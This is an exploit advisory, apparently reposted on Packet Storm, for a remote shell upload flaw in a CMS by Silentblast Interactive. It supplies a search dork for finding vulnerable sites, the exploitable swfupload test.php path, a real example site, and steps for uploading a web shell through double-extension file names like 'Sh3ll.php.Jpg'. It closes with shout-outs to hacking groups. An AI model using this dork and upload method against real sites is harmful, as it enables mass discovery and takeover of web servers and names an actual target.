CMS systems provided by Silentblast Interactive suffer from a remote shell upload vulnerability. Note that this finding houses site-specific data.
d76c471e226222540778870b238689c3374f836beaebb441943379bcfe6a0741-------------------- IN The NAme OF God --------------------
-====CMS Provided by Silentblast Interactive remote file uploader (RFU)====-
# Exploit Title:CMS Provided by Silentblast Interactive
# Exploit Author: FarbodEZRaeL
# Tested on: Windows xp
# MAil : farbodezrael@gmail.com
-====Dork====-
inurl:/admin/includes/swfupload/
-====Exploit====-
https://Site.C0M//admin/includes/swfupload/samples/php/test.php
-====Example====-
https://barrie.tv/admin/includes/swfupload/samples/php/test.php
-====information====-
Click <<--- Add Profile Picture or Add Picture -----Upload She3ll~~~>
Sh3ll.jpg or Sh3ll.php.Jpg
-====Tnx To====-
Mr.XpR - Syamak Black - UnknowN - MR.EBI - Samim.s
Saman Biliz - Sianor - Cair3x - M.R.S.C.0 - Bl4ck.Viper - Black King
Yaghi vahghi - H3llboy - inj3ct0r - Netqurd - Fixxer- R3ZA BLACK HAT
IRIST - Sokote.vahshat - TBH - IBH - IRH - ArYaIeIrAN - W0lf - Ajax TM
joker_s - mr.4lir3z4 - nimaarek - All iranian Hackerz
~~~~~~~~~~~~~~~~~~~~~~>> IRANHaCK.ORG
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed